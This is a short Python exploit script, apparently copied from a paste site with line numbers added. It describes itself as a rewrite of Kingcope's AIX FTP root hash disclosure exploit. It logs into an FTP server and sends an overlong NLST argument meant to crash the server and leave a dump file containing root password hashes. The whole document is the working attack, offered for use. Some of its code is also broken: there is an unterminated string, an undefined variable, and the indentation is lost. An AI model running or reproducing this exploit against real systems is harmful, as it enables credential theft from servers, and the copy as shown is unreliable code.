#!/usr/bin/python####################### Rewrite of Kingcopes AIX FTP root

1. #!/usr/bin/python
2. ###################
3. #
4. #
5. #
6. # Rewrite of Kingcopes AIX FTP root hash disclosure vuln
7. # Conversion by GraphX
8. # Because fuck Perl
9. #
10. #######################################################
11. from ftplib import FTP
12. import io
13. import os
14. import sys, getopt
15.  
16. def main (argv):
17. host = ''
18. user = ''
19. password = ''
20. try:
21. opts, args = getopt.getopt(argv,"h:u:p:",["host=","user=","password="])
22. except getopt.GetoptError:
23. print 'ftpdump.py usage: ftpdump.py -h <host> -u <username> -p <password>
24. sys.exit(2)
25. for opt, arg in opts:
26. if opt == '-h':
27. host = arg
28. elif opt == '-u':
29. user = arg
30. elif opt == '-p':
31. password = arg
32.  
33. fexploit(host,user,password)
34.  
35. def fexploit(h,u,p):
36. buff = 'A'*5000
37. ftp = FTP(h)
38. try:
39. print '[*] attempting FTP login'
40. ftp.login(u,p)
41. print '[*] using pub directory'
42. ftp.cwd(pub)
43. print '[*] attempting to trigger vulnerability'
44. ftp.nlst('~' + buff)
45. print '[*] no errors, I think we\'re good. Go look for that dump file'
46. except Exception, e:
47. print str(e)
48.  
49. if __name__ == "__main__":
50. main(sys.argv[1:])